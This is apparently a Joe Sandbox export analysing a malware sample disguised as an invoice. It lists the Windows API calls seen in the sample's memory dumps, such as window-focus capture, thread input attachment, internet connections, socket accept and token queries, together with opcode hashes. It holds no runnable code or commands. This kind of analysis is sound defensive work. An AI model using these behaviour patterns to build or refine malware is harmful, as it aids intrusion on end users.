                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                              • String ID:
                                                              • API String ID: 3058430110-0
                                                              • Opcode ID: 592ea736bb9ada00ad473d8d61f8a1a1cd525b4c114f9cb1522e967f4ab3fff2
                                                              • Instruction ID: 26b5a18fb95f95bcb0e5456e71f1088eff1cfd63eea4cfbe9c4fc18f34924b35
                                                              • Opcode Fuzzy Hash: 592ea736bb9ada00ad473d8d61f8a1a1cd525b4c114f9cb1522e967f4ab3fff2
                                                              • Instruction Fuzzy Hash: 6331C230620226BFDB29EFB4D844BBA7BA5BF40310F154019EA558B090E771D9E0DB90
                                                              APIs
                                                              • GetForegroundWindow.USER32 ref: 00257CB9
                                                                • Part of subcall function 00235F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00235F6F
                                                                • Part of subcall function 00235F55: GetCurrentThreadId.KERNEL32 ref: 00235F76
                                                                • Part of subcall function 00235F55: AttachThreadInput.USER32(00000000,?,0023781F), ref: 00235F7D
                                                              • GetCaretPos.USER32(?), ref: 00257CCA
                                                              • ClientToScreen.USER32(00000000,?), ref: 00257D03
                                                              • GetForegroundWindow.USER32 ref: 00257D09
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                              • String ID:
                                                              • API String ID: 2759813231-0
                                                              • Opcode ID: abdb392772a2494aa3f662fc0944a64c2d3c202f11150f65b28819c419e51492
                                                              • Instruction ID: 910f2a1497c3eff09ed3f51eeb8233f190ff5e1bde7482639bc9129d8a584dc0
                                                              • Opcode Fuzzy Hash: abdb392772a2494aa3f662fc0944a64c2d3c202f11150f65b28819c419e51492
                                                              • Instruction Fuzzy Hash: C1313E71910208AFDB10EFA5D8459EFBBF9EF54310B108466E819E3211DA319E158FA0
                                                              APIs
                                                                • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
                                                              • GetCursorPos.USER32(?), ref: 0025F211
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0026E4C0,?,?,?,?,?), ref: 0025F226
                                                              • GetCursorPos.USER32(?), ref: 0025F270
                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0026E4C0,?,?,?), ref: 0025F2A6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                              • String ID:
                                                              • API String ID: 2864067406-0
                                                              • Opcode ID: 978d131efcbaf6548bc80b61513f0de2a5ee245618d729ee0d9b9a7698f5a832
                                                              • Instruction ID: 13193db70d301087ddede47d4064cf48125c98b42b13ce2317daeb32a1620c4a
                                                              • Opcode Fuzzy Hash: 978d131efcbaf6548bc80b61513f0de2a5ee245618d729ee0d9b9a7698f5a832
                                                              • Instruction Fuzzy Hash: AB21D079510018AFCB258F94D958EEA7FB9EF49311F448069FD09872A1D33099A4DF94
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00244358
                                                                • Part of subcall function 002443E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00244401
                                                                • Part of subcall function 002443E2: InternetCloseHandle.WININET(00000000), ref: 0024449E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Internet$CloseConnectHandleOpen
                                                              • String ID:
                                                              • API String ID: 1463438336-0
                                                              • Opcode ID: 2ddada0d66b340e524f439c6d36ec0021f87cacf282a8e21ee7ed0ebd7c0d049
                                                              • Instruction ID: a3fdf0cc0e90322fd0d84be60daa3cdb99c641fcbad98285b596f4cb8cac97aa
                                                              • Opcode Fuzzy Hash: 2ddada0d66b340e524f439c6d36ec0021f87cacf282a8e21ee7ed0ebd7c0d049
                                                              • Instruction Fuzzy Hash: 9A21A476210A05BBDB19AF609C01F7BBBA9FF48B10F20401AFA5596550D7B198719B90
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00258AA6
                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00258AC0
                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00258ACE
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00258ADC
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$AttributesLayered
                                                              • String ID:
                                                              • API String ID: 2169480361-0
                                                              • Opcode ID: 395a25fcddf6b76a734f49e99e1be0936a2e88d42d1724e3266e51e334c5c1cd
                                                              • Instruction ID: 103dda87c519bb67c64929f6b2543d371dbf8b050e7f605333b5e2b9cedac32d
                                                              • Opcode Fuzzy Hash: 395a25fcddf6b76a734f49e99e1be0936a2e88d42d1724e3266e51e334c5c1cd
                                                              • Instruction Fuzzy Hash: 7011E631315115AFE704AB14DC1AFBA77ADFF85321F18411AF91AD72E1CBB0AC548B94
                                                              APIs
                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00248AE0
                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00248AF2
                                                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00248AFF
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00248B16
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastacceptselect
                                                              • String ID:
                                                              • API String ID: 385091864-0
                                                              • Opcode ID: 7c567055863e52a411f0fcdc7e9338b7f3c7aaa8f24340cfd7d0a52d87b4a753
                                                              • Instruction ID: f7849cc33aace3b1ca169227ad5ceebf8a882c88eb2952ba29cf4764a88df932
                                                              • Opcode Fuzzy Hash: 7c567055863e52a411f0fcdc7e9338b7f3c7aaa8f24340cfd7d0a52d87b4a753
                                                              • Instruction Fuzzy Hash: 3221D871A001249FC715DF68DC89AAEBBFCEF49350F00816AF849D7291DB74D9858F90
                                                              APIs
                                                                • Part of subcall function 00231E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00230ABB,?,?,?,0023187A,00000000,000000EF,00000119,?,?), ref: 00231E77
                                                                • Part of subcall function 00231E68: lstrcpyW.KERNEL32(00000000,?,?,00230ABB,?,?,?,0023187A,00000000,000000EF,00000119,?,?,00000000), ref: 00231E9D
                                                                • Part of subcall function 00231E68: lstrcmpiW.KERNEL32(00000000,?,00230ABB,?,?,?,0023187A,00000000,000000EF,00000119,?,?), ref: 00231ECE
                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0023187A,00000000,000000EF,00000119,?,?,00000000), ref: 00230AD4
                                                              • lstrcpyW.KERNEL32(00000000,?,?,0023187A,00000000,000000EF,00000119,?,?,00000000), ref: 00230AFA
                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,0023187A,00000000,000000EF,00000119,?,?,00000000), ref: 00230B2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: lstrcmpilstrcpylstrlen
                                                              • String ID: cdecl
                                                              • API String ID: 4031866154-3896280584
                                                              • Opcode ID: a357733012636922439a07c99e58ecd1aa19f39738d53cd65a24425de651c8e5
                                                              • Instruction ID: 5a36a82df268fe15e6db83b96bbfc8dd2c650cb2941ca95862f3dce79e60c9a2
                                                              • Opcode Fuzzy Hash: a357733012636922439a07c99e58ecd1aa19f39738d53cd65a24425de651c8e5
                                                              • Instruction Fuzzy Hash: 9311D676120305AFDB259F34DC55D7A77B9FF45314F80406AE809CB290EB719860C7A0
                                                              APIs
                                                              • _free.LIBCMT ref: 00222FB5
                                                                • Part of subcall function 0021395C: __FF_MSGBANNER.LIBCMT ref: 00213973
                                                                • Part of subcall function 0021395C: __NMSG_WRITE.LIBCMT ref: 0021397A
                                                                • Part of subcall function 0021395C: RtlAllocateHeap.NTDLL(00BF0000,00000000,00000001,00000001,00000000,?,?,0020F507,?,0000000E), ref: 0021399F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: c13905c8138dba30a94b8d6572547c992f566ea21e90747c1d1fb50714338410
                                                              • Instruction ID: 33d30882eba7f2a95205cb1f7dbc7c1640a3dd4083603a28a26f32f24dde6f6b
                                                              • Opcode Fuzzy Hash: c13905c8138dba30a94b8d6572547c992f566ea21e90747c1d1fb50714338410
                                                              • Instruction Fuzzy Hash: 7B11EB31438622BBDB217FB0BC446AA3BE4AF64760F204516F9099A151DA75C9B08EE0
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002305AC
                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 002305C7
                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002305DD
                                                              • FreeLibrary.KERNEL32(?), ref: 00230632
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                              • String ID:
                                                              • API String ID: 3137044355-0
                                                              • Opcode ID: 7c356cc91fda17c8a27ae5efa7d17191398d1282d3f70acf642201dca651f191
                                                              • Instruction ID: 428d4ec62e0267b6561a3a9c2f371bb1a60c55323a64dc866242b810eee8f204
                                                              • Opcode Fuzzy Hash: 7c356cc91fda17c8a27ae5efa7d17191398d1282d3f70acf642201dca651f191
                                                              • Instruction Fuzzy Hash: 8A2187B1A10209EFDB208F91DCDAADAB7BCEF40700F008469E51A92154D770EA65DF60
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00236733
                                                              • _memset.LIBCMT ref: 00236754
                                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 002367A6
                                                              • CloseHandle.KERNEL32(00000000), ref: 002367AF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                                              • String ID:
                                                              • API String ID: 1157408455-0
                                                              • Opcode ID: 530ff10b3b9cd91b9ab72130c3bd0348b249f4218d1288f3fa51e117d3c032ea
                                                              • Instruction ID: 0f2338d9368d1daa08b253fe963626cbfb31088aa069203664f618563b772a60
                                                              • Opcode Fuzzy Hash: 530ff10b3b9cd91b9ab72130c3bd0348b249f4218d1288f3fa51e117d3c032ea
                                                              • Instruction Fuzzy Hash: 9711CAB5D112287AE7205BA5AC4DFEBBABCEF44764F10419AF508E71D0D2744E808B64
                                                              APIs
                                                                • Part of subcall function 0022AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0022AA79
                                                                • Part of subcall function 0022AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0022AA83
                                                                • Part of subcall function 0022AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0022AA92
                                                                • Part of subcall function 0022AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0022AA99
                                                                • Part of subcall function 0022AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0022AAAF
                                                              • GetLengthSid.ADVAPI32(?,00000000,0022ADE4,?,?), ref: 0022B21B
                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0022B227
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0022B22E
                                                              • CopySid.ADVAPI32(?,00000000,?), ref: 0022B247
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                              • String ID:
                                                              • API String ID: 4217664535-0
                                                              • Opcode ID: 8c4137bec86b699111a3c53a5f08281d9b07822c2a9f39982b56a95ede4fe993
                                                              • Instruction ID: a1024a1dcd44104e03d43eb79077c13b006a9fa92735c40a82d4575149fbf192
                                                              • Opcode Fuzzy Hash: 8c4137bec86b699111a3c53a5f08281d9b07822c2a9f39982b56a95ede4fe993
                                                              • Instruction Fuzzy Hash: F011C171A10215FFCB099F98ED94AAEB7B9EF84304F14802DE94697210D731AE94CB10
                                                              APIs
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0022B498
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0022B4AA
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0022B4C0
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0022B4DB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 515c0fd73a72eab4a1c73be1bdebdd537f4341d266c76c01226b146437b8e725
                                                              • Instruction ID: bc9f097d02ab34a2551c049265ca2f159ff16bd9f5bf6272636c75ffb343ccc2
                                                              • Opcode Fuzzy Hash: 515c0fd73a72eab4a1c73be1bdebdd537f4341d266c76c01226b146437b8e725
                                                              • Instruction Fuzzy Hash: 6D11187A900228FFDB11EFA9D985E9DBBB8FB08710F204091E604B7295D771AE11DB94
                                                              APIs
                                                                • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
                                                              • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0020B5A5
                                                              • GetClientRect.USER32(?,?), ref: 0026E69A
                                                              • GetCursorPos.USER32(?), ref: 0026E6A4
                                                              • ScreenToClient.USER32(?,?), ref: 0026E6AF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                              • String ID:
                                                              • API String ID: 4127811313-0
                                                              • Opcode ID: ba6d3b8a16f71ebd5e49f09214fe408eff3ef2f182647f2e16791c4c667e03c1
                                                              • Instruction ID: b4e4b58fb4de6717fd806e4de7c411874996a9bce3e346203990e8400e62e546
                                                              • Opcode Fuzzy Hash: ba6d3b8a16f71ebd5e49f09214fe408eff3ef2f182647f2e16791c4c667e03c1
                                                              • Instruction Fuzzy Hash: 84113A3592012ABBCB21DF54DC498EE7BBCEF09305F500491E916E7181D330AAA5CBA5
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 00237352
                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00237385
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0023739B
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002373A2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 2880819207-0
                                                              • Opcode ID: 53cce8dc08c3c0879c3c7492e5d18e3bc4039eb0adeaef37ca8388fc03cf971d
                                                              • Instruction ID: 1d8cfb83369b30c77a4d7c0aeb5f4c4612d471e25d9f846259b8d00fef8b6319
                                                              • Opcode Fuzzy Hash: 53cce8dc08c3c0879c3c7492e5d18e3bc4039eb0adeaef37ca8388fc03cf971d
                                                              • Instruction Fuzzy Hash: 861104B2A14205BFDB11DFA8EC09A9E7BADAF45320F044355FC29E32A1D7708D109BA0
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0020D1BA
                                                              • GetStockObject.GDI32(00000011), ref: 0020D1CE
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0020D1D8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CreateMessageObjectSendStockWindow
                                                              • String ID:
                                                              • API String ID: 3970641297-0
                                                              • Opcode ID: 5b03246720dd700facd5a6da95f7da11fcc54d758aea46ada74b6947b68aa9d7
                                                              • Instruction ID: e898e9179fbd2101eb8b2bfa69db15ab0f9d2316f9336312153059bd43d8f4fa
                                                              • Opcode Fuzzy Hash: 5b03246720dd700facd5a6da95f7da11fcc54d758aea46ada74b6947b68aa9d7
                                                              • Instruction Fuzzy Hash: 3011AD7211260ABFEF024FA0AC54EEABB6DFF08364F040101FA1852090CB719CA0EBA0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                              • String ID:
                                                              • API String ID: 3016257755-0
                                                              • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                              • Instruction ID: 54606ef09f665170c3c508f1224bdcb0c8dc6692d44dcb12e3156b4a19cf63c8
                                                              • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                              • Instruction Fuzzy Hash: 4F014B3206016ABBDF126EC4EC01CEE3F22BB18350B5A8455FE2859035D376CAB1AF81
                                                              APIs
                                                                • Part of subcall function 00217A0D: __getptd_noexit.LIBCMT ref: 00217A0E
                                                              • __lock.LIBCMT ref: 0021748F
                                                              • InterlockedDecrement.KERNEL32(?), ref: 002174AC
                                                              • _free.LIBCMT ref: 002174BF
                                                              • InterlockedIncrement.KERNEL32(00C023B8), ref: 002174D7
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
